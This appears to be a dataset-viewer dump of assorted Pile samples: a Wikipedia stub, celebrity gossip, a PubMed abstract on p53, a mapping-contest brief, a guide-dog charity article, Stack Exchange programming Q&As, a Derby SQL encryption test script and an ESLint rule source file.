text
stringlengths 1
3.78M
| meta
dict |
|---|---|
1326 in Ireland
Events from the year 1326 in Ireland.
Deaths
Richard Óg de Burgh, 2nd Earl of Ulster
References
Category:1320s in Ireland
Ireland
Category:Years of the 14th century in Ireland
|
{
"pile_set_name": "Wikipedia (en)"
}
|
CLICK HERE FOR TRENDING VIDEOS
Hide Ya Kids: Celebs Who Are Notoriously Private About Their Precious Seeds
Celebrity Parents Who Keep Their Kids Out Of The Limelight
We love the precious celebrity seeds, but some stars aren’t so keen on sharing shots of their little ones with the rest of the world. And with celebrity stalkers poppin’ up left and right these days it’s not hard to understand why.
Hit the flip to see who made the list of our most paparazzi shy celebrity seeds.
Remember when Michael Jackson was still alive and we didn’t even have the slightest idea what Paris, Prince and Blanket looked like because they always wore masks?
Dwight Howard
Remember when Dwight went H.A.M over the idea of Royce letting Braylon be on “Basketball Wives”? And we still haven’t seen a single picture of that baby by Hope Alexa.
Pharrell Williams
Pharrell is so private about his son Rocket Mann Williams with model fiancée Helen Lasichanh that we usually forget he even has a kid. He doesn’t even comment about the baby in interviews!
Lauren London
We all saw Lauren’s baby bump, but HAS ANYBODY ever seen Kameron (or Cameron, however she spells it) in real life? Anybody? Anybody?
Dave Chappelle
Even before he went crazy and went into hiding from the Black Illuminati Dave Chappelle was notoriously private about his kids and even moved to some bumblefawk town to allow his family some measure of privacy.
Continue Slideshow
Jay-Z & Beyoncé
That baby stays swaddled so much, we’re still not sure if we believe the original photos Jay-Z posted were REALLY Blue Ivy.
Charlize Theron
Who knew Charlize Theron was even adopting a baby until he actually got here? And even then, we’ve only seen him a handful of times!
Halle Berry
Sure we see Nahla all the time, but when we do Halle is usually going all cray on the paps. Besides, she wants to move the kid to Paris so she doesn’t have to grow up in the “celebrity bubble.” Whatever that means.
Julia Roberts
She and her nobody husband moved to Santa Fe, New Mexico so their kids could be little nobodies too!
Chris Rock
He made a whole documentary inspired by his kids’ struggles with their hair and they never even made an appearance! We’re not sure if it’s his evil wife or him that keeps them out of the limelight.
|
{
"pile_set_name": "Pile-CC"
}
|
The common mechanisms of transformation by the small DNA tumor viruses: The inactivation of tumor suppressor gene products: p53.
The small DNA tumor viruses, Polyoma virus, Simian Vacuolating Virus 40, the Papilloma viruses and the human Adenoviruses, were first described during a period of intense virus discovery (1930-1960s) and shown to produce tumors in animals. In each of these cases the viral DNA was shown to persist (commonly integrated into a host chromosome) and only a selected portion of this DNA was expressed as m-RNA and proteins in these cancers. The viral encoded tumor antigens were identified and shown to be required to both establish the tumor and maintain the transformed cell phenotype. The functions of these viral tumor antigens were explored and shown to have common features and mechanisms even though they appear to have evolved from diverse genes. The SV40 large tumor antigen, the human Papilloma virus E7 protein and the Adenovirus E1A protein were shown to bind to and inactivate the functions of the Retinoblastoma proteins in transformed cells. This resulted in the activation of the E2F and DP transcription factors and the entry of cells into the S-phase of DNA synthesis which was required for viral DNA replication. These events triggered the activation of p53 which promotes apoptosis of these virus infected cells limiting virus replication and tumor formation. These viruses responded by evolving and producing the SV40 large tumor antigen, the human Papilloma virus E6 protein and the Adenovirus E1b-55Kd protein which binds to and inactivates the p53 functions in both the infected cells and transformed cells. Some of the human Papilloma viruses and one of the Polyoma viruses have been shown to cause selected cancers in humans. Both the p53 tumor suppressor gene, which was uncovered in the studies with these viruses, and the retinoblastoma protein, have been shown to play a central role in the origins of human cancers via both somatic and germ line mutations in those genes.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Hello and welcome to the first challenge for The Hammer Cup 2017.
Below are the details.
PLEASE READ THEM CAREFULLY.
As always, if you have any questions, you can either post a comment or if you require a private reply, send Phillip an email: planetphillip@gmail.com
Theme Details
We would like you to create a map in which the player has to defend a location from attack.
The player should be given a maximum of 5 minutes preparation time but MUST also have the option of triggering the attack manually (for example, with a button or some other clearly marked method).
We want you to create a map that allows for replayability by including a variety of defenses. Ideally, the map would allow for players to use a variety of defensive tactics on replays.
We DO NOT want you to simply create a rebel base and have a lot of Combine soldiers rush it. Maybe the Combine are attempting to destroy (or steal) something vital to the rebels and you have to specifically defend that.
Consider attack waves, with a slight rest between them for the player to regroup.
This challenge is not restricted to a Combine-only attack, so perhaps mix in other HL2 enemies if you like.
The player could be a Combine soldier instead (we will assume that the Combine have stolen an HEV). The location could be moving – maybe defend an APC that is carrying a rebel prisoner.
You should try to create something that will surprise the judges (and players!), is fun to play at least twice, and hopefully looks great and is polished.
We encourage you to look at the more successful maps in the original DefendVille for ideas or inspiration – but create your own ideas on the theme (and keep in mind DefendVille was slightly more restrictive than this challenge).
Differences from the original DefendVille
The original DefendVille had a 10 minute preparation time – this challenge has a maximum of 5 minutes plus the requirement to have a manual start.
The name “Outpost XYZ” was required for the first DefendVille, but NOT this one. You can name your map anything you like.
The Combine were supposed to attack a rebel outpost, hence the previous point. For this challenge, ANY enemy can attack ANY location.
Lastly, a radio message was supplied for the first DefendVille to introduce the theme in each map, it is NOT required this time. You can introduce the situation in any way you like.
The Hammer Cup 2017
The Hammer Cup 2017 consists of five mapping challenges, each with a different theme.
Entrants will receive points for each challenge they enter.
At the end of the event, the best 3 points totals from the challenges they entered will be added together for each entrant.
These totals will decide who wins the Grand Prizes.
This means that entrants do NOT have to enter each and every contest to win the grand prize but they will need to have entered at least 3 challenges to have a chance of winning the grand prizes.
Full details can currently be found here: The Hammer Cup Overview.
Deadline
The deadline for submitting maps is:
Monday 6th February at 11am GMT
That’s 19 days, with 3 full weekends.
General Advice
DO NOT GET TOO AMBITIOUS. If you can’t build it in 2 weekends then think smaller.
Something is bound to delay your progress. Leave time for testing, bug fixing and polishing!
Testing
We highly recommend getting your map beta tested by somebody you trust. Do this early in its development if you can.
Prizes
A random Steam or ORIGIN game will be awarded to the winner.
Judging Criteria
Each entry will be judged on Design, Sound, Visuals and Gameplay.
The judges are looking for interesting, surprising and clever interpretations of the theme as well as the replayability of the map.
General Rules
Maximum two maps per mapper per entry.
The map must be original and not have been released publicly before.
The map must run in system with only Ep2 installed
By entering the competition you grant PlanetPhillip.Com and RunThinkShootLive.Com the right to release the map as part of the RTSL-THC2017: DefendVilleTwo Mod.
Maps must not appear on ANY other website before the release and for one month after the release of the mod.
No assets from retail games other than HL2, HL2: Ep1 or HL2: Ep2 are allowed.
Other assets are allowed with written permission from their original authors, which MUST be included in the entry.
Phillip’s decision is final and no correspondence will be entered into about it.
The map MUST have a proper name.
The map MUST have a proper filename: MapName_thc17_c1.bsp
All entries must be sent to: planetphillip@gmail.com no later than the deadline.
no later than the deadline. If you do not receive a confirmation email without 24 hours of sending an entry, contact Phillip IMMEDIATELY.
Final Thoughts
The judges are hoping that this theme provides something for modders to focus on, but still leaves them plenty of scope for creativity.
If you have ANY questions, please don’t hesitate to ask, either here in the comments or by email if you prefer a private answer.
|
{
"pile_set_name": "OpenWebText2"
}
|
Olympian Sonia O’Sullivan is calling out to Tipperary people to volunteer with Irish charity Irish Guide Dogs in its upcoming campaigns.
The world champion runner regularly volunteers and lends her support to the national charity. Sonia is fronting a major radio and poster campaign that begins on Monday 3rd March 2014 to encourage more people to volunteer their time with the charity.
“Irish Guide Dogs change people’s lives,” said Sonia. “I love working with them. The impact of the working dogs is life-changing and so worthwhile. I’d like to encourage as many people as possible to help out. You will enjoy it as well as doing some good for other people.”
“We are a community-based charity and we need the support from people in every locality in Ireland to make a difference,” said Louise O’Sullivan Geary, Community Fundraising and Volunteer Manager. “We are 80% funded through voluntary donations and fundraising events so any help members of the public can give us is much appreciated.”
One working dog costs €38,000 to train through its working life and the charity offers its services to people for free to ensure it does not exclude anyone because of lack of income. In 2013 it trained the highest number of people to date, 197 people across all of its services.
“We could not do the work we do without the public’s support and generosity. Please get in touch to sign up to help,” said Louise.
You can volunteer with Irish Guide Dogs by email fundraising@guidedogs.ie, LoCall 1850 506300 or website www.guidedogs.ie
This website and its associated newspaper are full participating members of the Press Council of Ireland and supports the Office of the Press Ombudsman. This scheme in addition to defending the freedom of the press, offers readers a quick, fair and free method of dealing with complaints that they may have in relation to articles that appear on our pages. To contact the Office of the Press Ombudsman go towww.pressombudsman.ie or www.presscouncil.ie
Tipperary Star provides news, events and sport features from the Tipperary area. For the best up to date information relating to Tipperary and the surrounding areas visit us at Tipperary Star regularly or bookmark this page.
For you to enjoy all the features of this website Tipperary Star requires permission to use cookies.
Find Out More ▼
What is a Cookie?
What is a Flash Cookie?
Can I opt out of receiving Cookies?
About our Cookies
Cookies are small data files which are sent to your browser (Internet Explorer, Firefox, Chrome etc) from a website you visit. They are stored on your electronic device.
This is a type of cookie which is collected by Adobe Flash media player (it is also called a Local Shared Object) - a piece of software you may already have on your electronic device to help you watch online videos and listen to podcasts.
Yes there are a number of options available, you can set your browser either to reject all cookies, to allow only "trusted" sites to set them, or to only accept them from the site you are currently on.
However, please note - if you block/delete all cookies, some features of our websites, such as remembering your login details, or the site branding for your local newspaper may not function as a result.
The types of cookies we, our ad network and technology partners use are listed below:
Revenue Science ►
A tool used by some of our advertisers to target adverts to you based on pages you have visited in the past. To opt out of this type of targeting you can visit the 'Your Online Choices' website by clicking here.
Google Ads ►
Our sites contain advertising from Google; these use cookies to ensure you get adverts relevant to you. You can tailor the type of ads you receive by visiting here or to opt out of this type of targeting you can visit the 'Your Online Choices' website by clicking here.
Digital Analytics ►
This is used to help us identify unique visitors to our websites. This data is anonymous and we cannot use this to uniquely identify individuals and their usage of the sites.
Dart for Publishers ►
This comes from our ad serving technology and is used to track how many times you have seen a particular ad on our sites, so that you don't just see one advert but an even spread. This information is not used by us for any other type of audience recording or monitoring.
ComScore ►
ComScore monitor and externally verify our site traffic data for use within the advertising industry. Any data collected is anonymous statistical data and cannot be traced back to an individual.
Local Targeting ►
Our Classified websites (Photos, Motors, Jobs and Property Today) use cookies to ensure you get the correct local newspaper branding and content when you visit them. These cookies store no personally identifiable information.
Grapeshot ►
We use Grapeshot as a contextual targeting technology, allowing us to create custom groups of stories outside out of our usual site navigation. Grapeshot stores the categories of story you have been exposed to. Their privacy policy and opt out option can be accessed here.
Subscriptions Online ►
Our partner for Newspaper subscriptions online stores data from the forms you complete in these to increase the usability of the site and enhance user experience.
Add This ►
Add This provides the social networking widget found in many of our pages. This widget gives you the tools to bookmark our websites, blog, share, tweet and email our content to a friend.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Converting an AnsiString to a Unicode String
I'm converting a D2006 program to D2010. I have a value stored in a single byte per character string in my database and I need to load it into a control that has a LoadFromStream, so my plan was to write the string to a stream and use that with LoadFromStream. But it did not work. In studying the problem, I see an issue that tells me that I don't really understand how conversion from AnsiString to Unicode string works. Here is a piece of standalone code that illustrates the issue I am confused by:;
procedure TForm1.Button1Click(Sender: TObject); {$O-}
var
sBuffer: String;
oStringStream: TStringStream;
sAnsiString: AnsiString;
sUnicodeString: String;
iSize1,
iSize2: Word;
begin
sAnsiString := '12345';
oStringStream := TStringStream.Create(sBuffer);
sUnicodeString := sAnsiString;
iSize1 := StringElementSize(sAnsiString);
iSize2 := StringElementSize(sUnicodeString);
oStringStream.WriteString(sUnicodeString);
end;
If you break on the last line, and inspect the Bytes property of oStringStream, you will see that it looks like this:
Bytes (49 {$31}, 50 {$32}, 51 {$33}, 52 {$34}, 53 {$35}
I was expecting that it might look something like
(49 {$31}, 00 {$00}, 50 {$32}, 00 {$00}, 51 {$33}, 00 {$00},
52 {$34}, 00 {$00}, 53 {$35}, 00 {$00} ...
Apparently my expectations are in error. But then, how to convert an AnsiString to unicode?
I'm not getting the right results out of the LoadFromStream because it is reading from the stream two bytes at a time, but the data it is receiving is not arranged that way. What is it that I should do to give the LoadFromStream a well formed stream of data based on a unicode string?
Thank you for your help.
A:
What is the type of the oStringStream.WriteString's parameter? If it is AnsiString, you have an implicit conversion from Unicode to Ansi and that explains your example.
Updated: Now the real question is how TStringStream stores data internally.
In the following code sample (Delphi 2009)
procedure TForm1.Button1Click(Sender: TObject);
var
S: string;
SS: TStringStream;
begin
S:= 'asdfg';
SS:= TStringStream.Create(S); // 1 byte per char
SS.WriteString('321');
Label1.Caption:= SS.DataString;
SS.Free;
end;
TStringStream uses internally the default system ANSI encoding (1 byte per char).
The constructor and WriteString procedures convert a string argument from unicode to ANSI.
To override this behaviour you must declare the encoding explicitely in the constructor:
procedure TForm1.Button1Click(Sender: TObject);
var
S: string;
SS: TStringStream;
begin
S:= 'asdfg';
SS:= TStringStream.Create(S, TEncoding.Unicode); // 2 bytes per char
SS.WriteString('321');
Label1.Caption:= SS.DataString;
SS.Free;
end;
|
{
"pile_set_name": "StackExchange"
}
|
I am not sure if you remember hearing about HTC’s cool new Bluetooth Music Adapter that was announced at this years Mobile World Congress. If not, it’s this great little dongle that allows you to wirelessly stream music to an auxiliary input on any stereo that has a 3.5mm headphone jack and is finally available for purchase. What’s great about this little guy is that although it is made by HTC, it is not limited to HTC devices only. Since it uses Bluetooth it should work with any device that has Bluetooth connectivity and will eliminate the need for that annoying audio cable while driving or playing music at home. Simply plug the dongle into your car or home stereo’s auxiliary input and stream away! It will even auto-pair with select HTC smartphones and tablets.
The dongle supports A2DP as well as CSR aptX so music will sound much better than Bluetooth audio has sounded in the past. Sporting a microUSB port for charging, the dongle’s 85 mAh battery is rated at 5 hours of play time and will last 120 hours on standby. It also has a handy power-off feature that will activate after the device remains idle for a set period of time. Retailing for $59.99, you can order one right now from Sprint and have it delivered to your house in only a couple of days. I called my local Sprint store and ordered one so be on the lookout for a review in the near future. In the meantime, if you want to get one for yourself click through the source link below to place an order. This is going to be one handy accessory for those of you who use your Android device as a music player.
Thanks Kevin!
source: Sprint
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
Pythonic way to have a choice of 2-3 options as an argument to a function
I have a Python function which requires a number of parameters, one of which is the type of simulation to perform. For example, the options could be "solar", "view" or "both.
What is a Pythonic way to allow the user to set these?
I can see various options:
Use a string variable and check it - so it would be func(a, b, c, type='solar')
Set some constants in the class and use func(a, b, c, type=classname.SOLAR)
If there are only two options (as there are for some of my functions) force it into a True/False argument, by using something like func(a, b, c, do_solar=False) to get it to use the 'view' option.
Any preferences (or other ideas) for Pythonic ways of doing this?
A:
If the point Niklas' makes in his answer doesn't hold, I would use a string argument. There are Python modules in the standard library that use similar arguments. For example csv.reader().
sim_func(a, b, c, sim_type='solar')
Remember to give a reasonable error inside the function, that helps people out if they type in the wrong thing.
def sim_func(a, b, c, sim_type='solar'):
sim_types = ['solar', 'view', 'both']
if sim_type not in sim_types:
raise ValueError("Invalid sim type. Expected one of: %s" % sim_types)
...
A:
I don't like any of those options.
I'd define two different functions, perform_solar(a, b, c) and perform_view(a, b, c) and let the caller decide which ones he wants to use, in which order and with which arguments.
If the reason why you thought you'd have to pack these into one single function is that they share state, you should share that state in an object and define the functions as methods.
A:
Since functions are objects in python, you could actually process *args as a list of methods and pass the types of simulations as arbitratry args at the end. This would have the benefit of allowing you to define new simulations in the future without having to refactor this code.
def func(a, b, c, *args):
for arg in args:
arg(a, b, c)
def foosim(a, b, c):
print 'foosim %d' % (a + b + c)
def barsim(a, b, c):
print 'barsim %d' % (a * b * c)
Use:
func(2, 2, 3, foosim)
func(2, 2, 3, barsim)
func(2, 2, 3, foosim, barsim)
Output:
foosim 7
barsim 12
foosim 7
barsim 12
|
{
"pile_set_name": "StackExchange"
}
|
Q:
Negation of Hex in PHP, funny behavior
Got some weird behavior I was wondering if someone could clear up for me.
Check it out
$hex = 0x80008000;
print_r(decbin(intval($hex)) . '<br/>');
print_r(decbin($hex));
Outputs
10000000000000001000000000000000
10000000000000001000000000000000
As expected.
But
$hex = 0x80008000;
print_r(decbin(~intval($hex)) . '<br/>');
print_r(decbin(~$hex));
Outputs
1111111111111110111111111111111
1111111111111111111111111111111
Why is the middle bit not switching when $hex is negated?
A:
Gonna give a shot to my own question here.
Yes this is a 32-bit / 64-bit difference.
In 32-bit systems, a float type has to take up two memory spaces to get the required 64 bits. Php uses double-precision (see http://en.wikipedia.org/wiki/Floating_point#IEEE_754:_floating_point_in_modern_computers)
The $hex evaluates to a float type. Intval and decbin functions convert this into an int type (1st example above)
In the 2nd example we are using the not bitwise operator BEFORE we use decbin. This flips the bits in the two-memory space double-precision float first, and then is converted to int second. Giving us something different than what we expected.
Indeed, if we put the negate inside of the intval() like so:
$hex = 0x80008000;
print_r(decbin(intval(~$hex)) . '<br/>');
print_r(decbin(~$hex));
We get
1111111111111111111111111111111
1111111111111111111111111111111
As output.
I'm not good enough to prove this with math yet (which can be figured out with the help of this article http://en.wikipedia.org/wiki/Double_precision). But maybe when I have time later -_-
I think it's very important to learn how numbers are represented in computers so we can understand anomalies like this and not call them bugs.
|
{
"pile_set_name": "StackExchange"
}
|
--
-- Licensed to the Apache Software Foundation (ASF) under one or more
-- contributor license agreements. See the NOTICE file distributed with
-- this work for additional information regarding copyright ownership.
-- The ASF licenses this file to You under the Apache License, Version 2.0
-- (the "License"); you may not use this file except in compliance with
-- the License. You may obtain a copy of the License at
--
-- http://www.apache.org/licenses/LICENSE-2.0
--
-- Unless required by applicable law or agreed to in writing, software
-- distributed under the License is distributed on an "AS IS" BASIS,
-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-- See the License for the specific language governing permissions and
-- limitations under the License.
--
-- This script tests error cases where encryption of an un-encryped database
-- or re-encrption of an encrypted databases with new password/key should fail
-- when
-- 1) the database is booted read-only mode using jar subprotocol.
-- 2) the databases with log archive mode enabled. It should
--- succeed after disabling the log archive mode.
-- 3) when restoring from backup.
--------------------------------------------------------------------
-- Case : create a plain database, jar it up and then attempt
-- to encrypt using the jar protocol
connect 'jdbc:splice:endb;create=true';
create table t1(a int ) ;
insert into t1 values(1) ;
insert into t1 values(2) ;
insert into t1 values(3) ;
insert into t1 values(4) ;
insert into t1 values(5) ;
disconnect;
connect 'jdbc:splice:endb;shutdown=true';
-- now create archive of the database.
connect 'jdbc:splice:wombat;create=true';
create procedure CREATEARCHIVE(jarName VARCHAR(20), path VARCHAR(20), dbName VARCHAR(20))
LANGUAGE JAVA PARAMETER STYLE JAVA
NO SQL
EXTERNAL NAME 'com.splicemachine.dbTesting.functionTests.tests.lang.dbjarUtil.createArchive';
-- archive the "endb" and put in "ina.jar" with dbname as "jdb1".
call CREATEARCHIVE('ina.jar', 'endb', 'jdb1');
disconnect;
-- try encrypting the database 'jdb1' using the jar protocol.
-- should fail
connect 'jdbc:splice:jar:(ina.jar)jdb1;dataEncryption=true;bootPassword=xyz1234abc';
connect 'jdbc:splice:jar:(ina.jar)jdb1;dataEncryption=true;encryptionKey=6162636465666768';
-- Case: create a a jar file of an encrypted database and
-- try re-encrypting it while boot it with the jar sub protocol
-- encrypt the databases.
connect 'jdbc:splice:endb;dataEncryption=true;bootPassword=xyz1234abc';
insert into t1 values(6);
insert into t1 values(7);
disconnect;
connect 'jdbc:splice:endb;shutdown=true';
-- create archive of encrypted database.
connect 'jdbc:splice:wombat';
call CREATEARCHIVE('ina.jar', 'endb', 'jdb1');
disconnect;
-- test the encrypted jar db
connect 'jdbc:splice:jar:(ina.jar)jdb1;dataEncryption=true;bootPassword=xyz1234abc;';
select * from t1;
disconnect;
connect 'jdbc:splice:;shutdown=true';
-- now finally attempt to re-encrypt the encrypted jar db with
-- a new boot password, it should fail.
connect 'jdbc:splice:jar:(ina.jar)jdb1;dataEncryption=true;bootPassword=xyz1234abc;newBootPassword=new1234xyz';
-- testing (re) encryption of a database
-- when the log arhive mode enabled -----
-- Case : configuring a un-encrypted database for
-- encryption should fail, when log archive mode is enabled.
connect 'jdbc:splice:wombat';
create table emp(id int, name char (200));
insert into emp values (1, 'john');
insert into emp values(2 , 'mike');
insert into emp values(3 , 'robert');
-- take a backup , this is used later.
call SYSCS_UTIL.SYSCS_BACKUP_DATABASE('extinout/mybackup');
-- enable the log archive mode and perform backup.
call SYSCS_UTIL.SYSCS_BACKUP_DATABASE_AND_ENABLE_LOG_ARCHIVE_MODE(
'extinout/mybackup1', 0);
insert into emp select * from emp ;
insert into emp select * from emp ;
insert into emp select * from emp ;
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- attempt to configure the database for encryption using password.
connect 'jdbc:splice:wombat;dataEncryption=true;bootPassword=xyz1234abc;';
-- attempt to configure the database for encryption using key.
connect 'jdbc:splice:wombat;dataEncryption=true;encryptionKey=6162636465666768';
-- disable log archive mode and then reattempt encryption on
-- next boot.
connect 'jdbc:splice:wombat';
select count(*) from emp ;
call SYSCS_UTIL.SYSCS_DISABLE_LOG_ARCHIVE_MODE(1);
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- Case: encrypt the database, with log archive mode disabled.
connect 'jdbc:splice:wombat;dataEncryption=true;bootPassword=xyz1234abc;';
select count(*) from emp;
create table t1(a int ) ;
insert into t1 values(1);
-- enable log archive mode and perform backup.
call SYSCS_UTIL.SYSCS_BACKUP_DATABASE_AND_ENABLE_LOG_ARCHIVE_MODE(
'extinout/mybackup2', 0);
insert into t1 values(2);
insert into t1 values(3);
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- attempt to re-encrypt the database , with log archive mode enabled.
-- it should fail.
connect 'jdbc:splice:wombat;dataEncryption=true;bootPassword=xyz1234abc;newBootPassword=new1234xyz';
-- reboot the db and disable the log archive mode
connect 'jdbc:splice:wombat;bootPassword=xyz1234abc';
select * from t1;
call SYSCS_UTIL.SYSCS_DISABLE_LOG_ARCHIVE_MODE(1);
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- re-encrypt the database, with the log archive mode disabled.
-- it should pass.
connect 'jdbc:splice:wombat;dataEncryption=true;bootPassword=xyz1234abc;newBootPassword=new1234xyz';
select * from t1;
select count(*) from emp;
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- testing re-encryption with external key on a log archived database.
-- restore from the backup orignal un-encrypted database and
-- encrypt with a key.
connect 'jdbc:splice:wombat;restoreFrom=extinout/mybackup1/wombat';
select count(*) from emp;
call SYSCS_UTIL.SYSCS_DISABLE_LOG_ARCHIVE_MODE(1);
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- encrypt with a key and enable the log archive mode.
connect 'jdbc:splice:wombat;dataEncryption=true;encryptionKey=6162636465666768';
select count(*) from emp;
create table t1(a int ) ;
insert into t1 values(1);
-- enable log archive mode and perform backup.
call SYSCS_UTIL.SYSCS_BACKUP_DATABASE_AND_ENABLE_LOG_ARCHIVE_MODE(
'extinout/mybackup2', 0);
insert into t1 values(2);
insert into t1 values(3);
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- attempt to re-encrypt the database with external key, with log archive mode enabled.
-- it should fail.
connect 'jdbc:splice:wombat;encryptionKey=6162636465666768;newEncryptionKey=5666768616263646';
-- reboot the db and disable the log archive mode
connect 'jdbc:splice:wombat;encryptionKey=6162636465666768';
select * from t1;
call SYSCS_UTIL.SYSCS_DISABLE_LOG_ARCHIVE_MODE(1);
call SYSCS_UTIL.SYSCS_BACKUP_DATABASE('extinout/mybackup1');
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- now re-encrypt the database, with the log archive mode disbaled.
-- it should pass.
connect 'jdbc:splice:wombat;encryptionKey=6162636465666768;newEncryptionKey=5666768616263646';
select * from t1;
select count(*) from emp;
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
-- restore from backup and attempt to configure database for encryption.
-- it shoud fail.
connect 'jdbc:splice:wombat;restoreFrom=extinout/mybackup/wombat;dataEncryption=true;bootPassword=xyz1234abc';
-- creating database from backup and attempting to configure database for encryption.
-- it shoud fail.
connect 'jdbc:splice:wombat_new;createFrom=extinout/mybackup/wombat;dataEncryption=true;bootPassword=xyz1234abc';
-- restore from backup and attempt to reEncrypt
-- it should fail.
connect 'jdbc:splice:wombat;restoreFrom=extinout/mybackup1/wombat;encryptionKey=6162636465666768;newEncryptionKey=5666768616263646';
-- restore from backup without re-encryption
-- it shoud boot.
connect 'jdbc:splice:wombat;restoreFrom=extinout/mybackup1/wombat;encryptionKey=6162636465666768';
select count(*) from emp;
disconnect;
connect 'jdbc:splice:wombat;shutdown=true';
|
{
"pile_set_name": "Github"
}
|
/**
* @author Yosuke ota
* See LICENSE file in root directory for full license.
*/
'use strict'
// -----------------------------------------------------------------------------
// Requirements
// -----------------------------------------------------------------------------
const htmlComments = require('../utils/html-comments')
// ------------------------------------------------------------------------------
// Helpers
// ------------------------------------------------------------------------------
/**
* Normalize options.
* @param {number|"tab"|undefined} type The type of indentation.
* @returns { { indentChar: string, indentSize: number, indentText: string } } Normalized options.
*/
function parseOptions(type) {
const ret = {
indentChar: ' ',
indentSize: 2,
indentText: ''
}
if (Number.isSafeInteger(type)) {
ret.indentSize = Number(type)
} else if (type === 'tab') {
ret.indentChar = '\t'
ret.indentSize = 1
}
ret.indentText = ret.indentChar.repeat(ret.indentSize)
return ret
}
/**
* @param {string} s
* @param {string} [unitChar]
*/
function toDisplay(s, unitChar) {
if (s.length === 0 && unitChar) {
return `0 ${toUnit(unitChar)}s`
}
const char = s[0]
if (char === ' ' || char === '\t') {
if (s.split('').every((c) => c === char)) {
return `${s.length} ${toUnit(char)}${s.length === 1 ? '' : 's'}`
}
}
return JSON.stringify(s)
}
/** @param {string} char */
function toUnit(char) {
if (char === '\t') {
return 'tab'
}
if (char === ' ') {
return 'space'
}
return JSON.stringify(char)
}
// ------------------------------------------------------------------------------
// Rule Definition
// ------------------------------------------------------------------------------
module.exports = {
meta: {
type: 'layout',
docs: {
description: 'enforce consistent indentation in HTML comments',
categories: undefined,
url: 'https://eslint.vuejs.org/rules/html-comment-indent.html'
},
fixable: 'whitespace',
schema: [
{
anyOf: [{ type: 'integer', minimum: 0 }, { enum: ['tab'] }]
}
],
messages: {
unexpectedBaseIndentation:
'Expected base point indentation of {{expected}}, but found {{actual}}.',
missingBaseIndentation:
'Expected base point indentation of {{expected}}, but not found.',
unexpectedIndentationCharacter:
'Expected {{expected}} character, but found {{actual}} character.',
unexpectedIndentation:
'Expected indentation of {{expected}} but found {{actual}}.',
unexpectedRelativeIndentation:
'Expected relative indentation of {{expected}} but found {{actual}}.'
}
},
/** @param {RuleContext} context */
create(context) {
const options = parseOptions(context.options[0])
const sourceCode = context.getSourceCode()
return htmlComments.defineVisitor(
context,
null,
(comment) => {
const baseIndentText = getLineIndentText(comment.open.loc.start.line)
let endLine
if (comment.value) {
const startLine = comment.value.loc.start.line
endLine = comment.value.loc.end.line
const checkStartLine =
comment.open.loc.end.line === startLine ? startLine + 1 : startLine
for (let line = checkStartLine; line <= endLine; line++) {
validateIndentForLine(line, baseIndentText, 1)
}
} else {
endLine = comment.open.loc.end.line
}
if (endLine < comment.close.loc.start.line) {
// `-->`
validateIndentForLine(comment.close.loc.start.line, baseIndentText, 0)
}
},
{ includeDirectives: true }
)
/**
* Checks whether the given line is a blank line.
* @param {number} line The number of line. Begins with 1.
* @returns {boolean} `true` if the given line is a blank line
*/
function isEmptyLine(line) {
const lineText = sourceCode.getLines()[line - 1]
return !lineText.trim()
}
/**
* Get the actual indentation of the given line.
* @param {number} line The number of line. Begins with 1.
* @returns {string} The actual indentation text
*/
function getLineIndentText(line) {
const lineText = sourceCode.getLines()[line - 1]
const charIndex = lineText.search(/\S/)
// already checked
// if (charIndex < 0) {
// return lineText
// }
return lineText.slice(0, charIndex)
}
/**
* Define the function which fixes the problem.
* @param {number} line The number of line.
* @param {string} actualIndentText The actual indentation text.
* @param {string} expectedIndentText The expected indentation text.
* @returns { (fixer: RuleFixer) => Fix } The defined function.
*/
function defineFix(line, actualIndentText, expectedIndentText) {
return (fixer) => {
const start = sourceCode.getIndexFromLoc({
line,
column: 0
})
return fixer.replaceTextRange(
[start, start + actualIndentText.length],
expectedIndentText
)
}
}
/**
* Validate the indentation of a line.
* @param {number} line The number of line. Begins with 1.
* @param {string} baseIndentText The expected base indentation text.
* @param {number} offset The number of the indentation offset.
*/
function validateIndentForLine(line, baseIndentText, offset) {
if (isEmptyLine(line)) {
return
}
const actualIndentText = getLineIndentText(line)
const expectedOffsetIndentText = options.indentText.repeat(offset)
const expectedIndentText = baseIndentText + expectedOffsetIndentText
// validate base indent
if (
baseIndentText &&
(actualIndentText.length < baseIndentText.length ||
!actualIndentText.startsWith(baseIndentText))
) {
context.report({
loc: {
start: { line, column: 0 },
end: { line, column: actualIndentText.length }
},
messageId: actualIndentText
? 'unexpectedBaseIndentation'
: 'missingBaseIndentation',
data: {
expected: toDisplay(baseIndentText),
actual: toDisplay(actualIndentText.slice(0, baseIndentText.length))
},
fix: defineFix(line, actualIndentText, expectedIndentText)
})
return
}
const actualOffsetIndentText = actualIndentText.slice(
baseIndentText.length
)
// validate indent charctor
for (let i = 0; i < actualOffsetIndentText.length; ++i) {
if (actualOffsetIndentText[i] !== options.indentChar) {
context.report({
loc: {
start: { line, column: baseIndentText.length + i },
end: { line, column: baseIndentText.length + i + 1 }
},
messageId: 'unexpectedIndentationCharacter',
data: {
expected: toUnit(options.indentChar),
actual: toUnit(actualOffsetIndentText[i])
},
fix: defineFix(line, actualIndentText, expectedIndentText)
})
return
}
}
// validate indent length
if (actualOffsetIndentText.length !== expectedOffsetIndentText.length) {
context.report({
loc: {
start: { line, column: baseIndentText.length },
end: { line, column: actualIndentText.length }
},
messageId: baseIndentText
? 'unexpectedRelativeIndentation'
: 'unexpectedIndentation',
data: {
expected: toDisplay(expectedOffsetIndentText, options.indentChar),
actual: toDisplay(actualOffsetIndentText, options.indentChar)
},
fix: defineFix(line, actualIndentText, expectedIndentText)
})
}
}
}
}
|
{
"pile_set_name": "Github"
}
|
